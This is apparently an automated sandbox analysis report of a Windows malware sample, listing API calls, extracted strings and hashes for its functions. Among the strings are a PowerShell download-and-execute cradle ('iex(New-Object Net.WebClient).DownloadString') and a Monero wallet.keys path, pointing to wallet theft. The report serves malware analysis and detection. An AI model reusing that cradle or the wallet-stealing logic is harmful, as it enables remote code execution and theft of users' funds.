                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                              • Instruction ID: be05ee93d8a94c722bc6773110b992d093698e7882180927b8ab200ae81ad430
                              • Opcode Fuzzy Hash: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                              • Instruction Fuzzy Hash: B7313C74A0020DEFDB14DFA4C895BAEB7B5FF48305F148258E905A7290D774A981DFB2
                              APIs
                              • lstrcat.KERNEL32(?,008DDF38), ref: 00D447DB
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44801
                              • lstrcat.KERNEL32(?,?), ref: 00D44820
                              • lstrcat.KERNEL32(?,?), ref: 00D44834
                              • lstrcat.KERNEL32(?,008CB108), ref: 00D44847
                              • lstrcat.KERNEL32(?,?), ref: 00D4485B
                              • lstrcat.KERNEL32(?,008DD0B8), ref: 00D4486F
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                                • Part of subcall function 00D44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                                • Part of subcall function 00D44570: RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                                • Part of subcall function 00D44570: wsprintfA.USER32 ref: 00D445A6
                                • Part of subcall function 00D44570: FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                              • Instruction ID: cbdca2e526c23221ac579e98c5fd5e19b95147cbfaace7e5a6be44092c5b7088
                              • Opcode Fuzzy Hash: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                              • Instruction Fuzzy Hash: E5313EB694021CABCB14FBA0DC85EED7378AB98700F404589B35996081EE7496C9DFB6
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D42D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D42D04
                              • ')", xrefs: 00D42CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D42CC4
                              • <, xrefs: 00D42D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                              • Instruction ID: 76a403fec2088b30f03c214b8685a66899c9ec4ce88e5532f81a417a58e24f91
                              • Opcode Fuzzy Hash: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                              • Instruction Fuzzy Hash: 7241AA71C502189BEB14EBA4C892BEDBB78EF14304F504119F516A7192EF746A4ACFB2
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00D39F41
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 3cd94db32c79b005f9dd0148e033d043dc94c8a9308a7b91861564a9bcf53089
                              • Instruction ID: 7f8ead452830c6786b531979cc76e82eb23c7d8d4709056dcca56bcb3a3d31b3
                              • Opcode Fuzzy Hash: 3cd94db32c79b005f9dd0148e033d043dc94c8a9308a7b91861564a9bcf53089
                              • Instruction Fuzzy Hash: 7F612F75A502489FDB28EFA8CC96FED7775EF44304F008118F90A5B195EB74AA09CB72
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,008DD238,00000000,00020119,?), ref: 00D440F4
                              • RegQueryValueExA.ADVAPI32(?,008DDE78,00000000,00000000,00000000,000000FF), ref: 00D44118
                              • RegCloseKey.ADVAPI32(?), ref: 00D44122
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44147
                              • lstrcat.KERNEL32(?,008DDE48), ref: 00D4415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                              • Instruction ID: 11dcba6ed4d712a5339298d4114b35f22c812935002097a905f20414dc60dc9a
                              • Opcode Fuzzy Hash: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                              • Instruction Fuzzy Hash: 8C4136B690010C6BDB14FBA0DC56FEE737DEB88300F404558B61A96181EA755BC89BB3
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00D4696C
                              • sscanf.NTDLL ref: 00D46999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469C0
                              • ExitProcess.KERNEL32 ref: 00D469DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
                              • Instruction ID: c362a15fb8cab86a497a5ea3b8dd9283ffed275551dd6f365caa3312409891c6
                              • Opcode Fuzzy Hash: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
                              • Instruction Fuzzy Hash: 7121BA75D1420CABCF04EFE8E9459EEB7B5FF48300F04852AE41AA3250EB749645DB66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,008CBB60,00000000,00020119,?), ref: 00D47E5E
                              • RegQueryValueExA.ADVAPI32(?,008DD198,00000000,00000000,000000FF,000000FF), ref: 00D47E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00D47E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                              • Instruction ID: 8db298208410da85f1af5db1dc7e038a3dfafeaada69439b69b4d8b6882efeda
                              • Opcode Fuzzy Hash: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                              • Instruction Fuzzy Hash: D31191B1A44209EBD704CF94DC49FBFBBB8EB44701F104269FA19A7280D77458009BB2
                              APIs
                              • StrStrA.SHLWAPI(008DDBC0,?,?,?,00D4140C,?,008DDBC0,00000000), ref: 00D4926C
                              • lstrcpyn.KERNEL32(00F7AB88,008DDBC0,008DDBC0,?,00D4140C,?,008DDBC0), ref: 00D49290
                              • lstrlen.KERNEL32(?,?,00D4140C,?,008DDBC0), ref: 00D492A7
                              • wsprintfA.USER32 ref: 00D492C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                              • Instruction ID: bd621b90faaab6e2a49f72188de5a4307ad749fdf73b48cf2b1533522225b596
                              • Opcode Fuzzy Hash: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                              • Instruction Fuzzy Hash: 5701E97550010CFFCB04DFECC994EAE7BB9EB84351F118188F9098B201C671AA50EBA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                              • RegCloseKey.ADVAPI32(?), ref: 00D312FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                              • Instruction ID: 8d393aeefcad8b54cfaff967a2e5df8a4739ea223602a029ee273b1eff2ae1b5
                              • Opcode Fuzzy Hash: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                              • Instruction Fuzzy Hash: 8E01E1B9A4020DBBDB04DFE4DC49FAEB7B8EB88701F108159FA0997280D6759A419F52
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 50624b672602926a83db4c49491de4d445c4b15159d5ed60aca8b40d87e7f902
                              • Instruction ID: 750c12d1e4d508ec4c173a4c103f900d5c625beca94444c4c11e705e434601c8
                              • Opcode Fuzzy Hash: 50624b672602926a83db4c49491de4d445c4b15159d5ed60aca8b40d87e7f902
                              • Instruction Fuzzy Hash: 6941077111179C6FDB218B24CC84FFBBBE99F45705F1854E8E9CA86182E2719A44CF70
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D46663
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D46726
                              • ExitProcess.KERNEL32 ref: 00D46755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                              • Instruction ID: dacd898773cd9186cf43087a30bfd6579d8a87000d8e108e99bd1adf535b8d16
                              • Opcode Fuzzy Hash: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                              • Instruction Fuzzy Hash: 38310CB1841218ABEB14EBA4DC96FDEB778EF44300F404199F20966191DF746B89CF76
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E28,00000000,?), ref: 00D4882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D48836
                              • wsprintfA.USER32 ref: 00D48850
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                              • Instruction ID: e8cf9485563fdad084531af7c4ff7d2d2a78c92a01c05bbcdaf648583639d9ee
                              • Opcode Fuzzy Hash: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                              • Instruction Fuzzy Hash: 832130B1A40208AFDB04DF94DD45FAEBBB8FB48701F144159F619A7280C77999419BA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D4951E,00000000), ref: 00D48D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D48D62
                              • wsprintfW.USER32 ref: 00D48D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                               • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                              • Instruction ID: d981db67a730bed3978b01c4211eb8670daf2b39eeacac714cca1011a62adf2c
                              • Opcode Fuzzy Hash: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                              • Instruction Fuzzy Hash: 43E0ECB5A4020CBFDB14DB94DD0AE6D7BBCEB84702F044194FD0D97280DA719E54ABA7
                              APIs
